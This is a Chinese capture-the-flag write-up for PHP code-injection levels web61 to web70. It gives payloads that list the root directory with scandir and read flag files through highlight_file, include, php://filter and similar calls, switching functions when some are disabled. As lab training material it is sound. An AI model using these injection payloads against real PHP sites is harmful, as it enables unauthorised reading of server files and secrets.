Web 61~70

  • web61~65
    • 题解
  • web66
    • 知识点
    • 题解
  • web67
    • 知识点
    • 题解
  • web68
    • 知识点
    • 题解
  • web69
    • 知识点
    • 题解
  • web70
    • 知识点
    • 题解

ctf - web入门

web61~65

题解

这几个题都和 web58 一样。可能内部禁用的函数不一样吧。但 payload 都差不多。不多解释了。

在这里插入图片描述

以下解法随便挑一个即可。可能不同题会有部分函数被禁。

payload1

c=include "php://filter/read=convert.base64-encode/resource=flag.php";

payload2

c=show_source('flag.php');

payload3

c=file_get_contents('flag.php');

payload4

c=highlight_file("flag.php");

在这里插入图片描述

web66

知识点

PHP 中:

  • scandir():扫描目录。

题解

题目没变化。

在这里插入图片描述

随便试一个函数。

在这里插入图片描述

根据提示,先扫一下根目录。

c=print_r(scandir('/'));

在这里插入图片描述

可得 payload:

c=highlight_file("/flag.txt");

web67

知识点

  • var_dump():打印变量的相关信息

题解

题目就不贴了。和前几题一模一样的。

区别在于,print_r() 函数被禁了。

那就用 var_dump() 函数。

c=var_dump(scandir('/'));

在这里插入图片描述

payload

c=highlight_file("/flag.txt");

web68

知识点

  • include():表达式包含并运行指定文件。

题解

一上来就说 highlight_file() 函数被禁了。

在这里插入图片描述

先尝试扫一下根目录。

c=var_dump(scandir('/'));

在这里插入图片描述

那就使用 include() 函数将文件内容包含进来。

payload

c=include("/flag.txt");

web69

知识点

  • var_export:输出或返回变量的可解析字符串表示。

题解

题目与 web68 一样。

但是 var_dump() 被禁了。

换一个函数即可。

c=var_export(scandir("/"));

在这里插入图片描述

payload

c=include("/flag.txt");

web70

知识点

  • error_reporting():设置应该报告何种 PHP 错误。
  • ini_set():配置选项设置值。

对这题来说没啥用的函数。

题解

看题,禁用了一堆函数。

在这里插入图片描述

但其实沿用 web69 的方法即可。

c=var_export(scandir("/"));
c=include("/flag.txt");

一笑出门去,千里落花风。

——《水调歌头 · 我饮不须劝》(宋)辛弃疾

点赞(0) 打赏

评论列表 共有 0 条评论

暂无评论

微信小程序

微信扫一扫体验

立即
投稿

微信公众账号

微信扫一扫加关注

发表
评论
返回
顶部